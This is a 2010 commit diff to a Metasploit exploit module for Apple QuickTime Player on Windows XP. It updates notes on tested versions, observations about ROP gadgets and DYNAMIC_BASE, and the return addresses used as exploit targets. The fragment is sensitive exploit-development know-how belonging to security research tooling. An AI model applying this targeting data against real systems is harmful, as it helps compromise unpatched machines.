update test notes

git-svn-id: file:///home/svn/framework3/trunk@10204 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-08-31 17:55:43 +00:00
parent 8dc12802fa
commit ace873a37a
1 changed files with 13 additions and 6 deletions

View File

@ -69,14 +69,21 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Apple QuickTime Player 7.6.7 on Windows XP SP3 with IE6',
# Tested OK:
#
# QT 7.6.6 + XP SP3 + IE8
# QT 7.6.7 + XP SP3 + IE6
#
# @eromange reports it doesn't work on 7.6.5
# - further investigation shows QuickTimeAuthoring.qtx changed / rop gadgets different
# QuickTimeAuthoring.qtx 7.6.7 is compiled w/DYNAMIC_BASE, so win7 is :(
[ 'Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3',
{
'Ret' => 0x677a0000, # base of QuickTimeAuthoring.qtx
}
],
[ 'Apple QuickTime Player 7.6.7 on Windows 7 with IE8',
{
'Ret' => 0x6c890000, # base of QuickTimeAuthoring.qtx
#'Ret' => 0x67780000, # base of QuickTimeAuthoring.qtx v7.6.5
}
],
],